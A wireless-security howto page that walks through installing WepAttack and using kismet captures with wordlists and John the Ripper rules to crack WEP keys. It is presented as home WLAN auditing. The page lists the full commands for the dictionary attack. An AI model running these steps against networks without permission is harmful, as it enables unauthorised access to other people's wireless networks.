Linux

 

Linux tools, Howtos

 

Tools Index

 

Wireless Commands

 

FC6 Build Howto

 

FC5 Build Howto

 

FC4 Build Howto

 

Live Linux Distros

 

 

Site Search

 

 

 

 

Windows

 

WIN32 tools, Howtos

 

Tools Index

 

 

Get Firefox!

 

 

General

 

Miscellaneous WI-FI

 

Default WI-FI Settings

 

Rogue AP Howtos

 

WI-FI Certifications

 

802.11 Standards

 

STEP BY STEP Guides

 

Formats / Extensions

 

WI-FI Home Security

 

Useful Links

 

 

 

 

 

WepAttack Main:

"WepAttack is a WLAN open source Linux tool for breaking 802.11 WEP keys. This tool is based on an active dictionary attack that tests millions of words to find the right key.  Only one packet is required to start an attack." -wepattack.sourceforge.net

Project homepage: http://wepattack.sourceforge.net/

Local Mirror: WepAttack-0.1.3.tar.gz  MD5: be5a77902c992096dd95069bdade343b

WepAttack is surely the quickest way of breaking into any WEP enable WLAN.  We see regular WepAttack audits as essential on home WLANs (commerce should be using something stronger than WEP!) akin to performing regular lophtcrack password audits.

 

Installing WepAttack:

Project homepage: http://wepattack.sourceforge.net/

The following installation process assumes that you are utilising the Auditing Laptop Build as described in the Auditing Laptop Build: HOWTO 

Download WepAttack-0.1.3.tar.gz from http://sourceforge.net/projects/wepattack/ to /tools/wifi/

tar zxvf WepAttack-0.1.3.tar.gz

cd WepAttack-0.1.3/src

make

make install

 

wepattack (should now show the wepattack help)

 

 

Trouble shooting:

 

Whilst performing the make you receive the following error:

 

hcpd ath0gcc  -o wepattack wepattack.o rc4.o wepfilter.o log.o\

              modes.o misc.o verify.o keygen.o -lpcap -z -lcrypto

gcc:  log.omodes.o: No such file or directory

make:  *** [wepattack] Error 1

 

Edit Wepattack-0.1.3/src/Makefile, line 24, and add a space

 

so

 

$(LD)  $(LDFLAGS)  -o  $@  wepattack.o  rc4.o  wepfilter.o  log.o\

 

reads

 

$(LD)  $(LDFLAGS)  -o  $@  wepattack.o  rc4.o  wepfilter.o  log.o  \

 

 

Now re-run make and all should be fine.

 

 

Installing WepAttack wordlist:

WepAttack also provides its own 31MB wordlist (wordlist.tar.gz) for download from http://sourceforge.net/projects/wepattack/ this (or your own custom wordlist) should be downloaded to /tools/wifi/WepAttack-0.1.3/src

cd /tools/wifi/WepAttack-0.1.3/src

tar zxvf wordlist.tar.gz and you're done : )

 

 

 

Capturing Encrypted Packets:

Before we can attempt to break any WEP using WepAttack's dictionary attack we first need to capture one encrypted packet.  The easiest way to do this is with kismet (any tool that generates dump files in pcap format can be used e.g. Tcpdump, Ethereal) assuming you have installed kismet as per our instructions as follows:

kismet

Use 's' to sort the networks and 'f' to sort by first time seen

Use 'L' to lock kismet to the channel of the desired network

Now we simply wait until we have captured an encrypted packet or packets.  The Info window to the right hand side of the kismet display and the Cryptd counter will indicate when we have the necessary packet (see below).

 

NOTE: We have captured 44 encrypted packets, but only 1 is required.

 

Now we have our encrypted packets, exist from kismet 'Q'. 

 

My kismet dump is now auto saved to /tmp/Kismet-Dec-01-2005-3.dump (filename will obviously vary)

 

 

Using WepAttack:

usage: wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]

Now we process the kismet dump file with WepAttack against our specified wordlist:

cd /tools/wifi/WepAttack-0.1.3/src

wepattack -f /tmp/Kismet-Dec-01-2005-3.dump -w wordlist -m 128

*This will attempt to crack all networks to be more specific use the -n switch.

 

 

Results are written to WepAttack-[current_date].log

If the network is utilising a dictionary word that is contained within the wordlist you are using you should be able to determine the WEP key. 

 

 

Using JtR with WepAttack:

Whilst optional, if you wish to make use of John the Ripper (JtR) to expand your WepAttack audit  JtR will also need installing:

Download john-1.6.tar.gz from http://www.openwall.com/john/ to /tools/wifi/

cd /tools/wifi

tar zxvf john-1.6.tar.gz

cd john/src

make linux-x86-mmx-elf

To allow us to run john from the WepAttack directory:

ln -s /tools/wifi/john-1.6/run/john  /tools/wifi/WepAttack-0.1.3/src

cp /tools/wifi/john-1.6/run/john.ini  /tools/wifi/WepAttack-0.13/src

John the Ripper (JtR) is a very efficient password cracker.  JtR is able to take a word from a dictionary file and generate different variations of the same word e.g. world would be expanded to World, w0rld, world1 etc..

To use JtR output with WepAttack we use the following syntax:

./john –wordfile:wordlist  –rules –stdout | wepattack –f /tmp/Kismet-Dec-01-2005-3.dump

Using JtR to generate variations on the default wordlist expands the dictionary attack from  3,290,000 words to well in excess of 15,500,000 words!


 

  
 
  © Copyright 2010 Wirelessdefence.org. All Rights Reserved.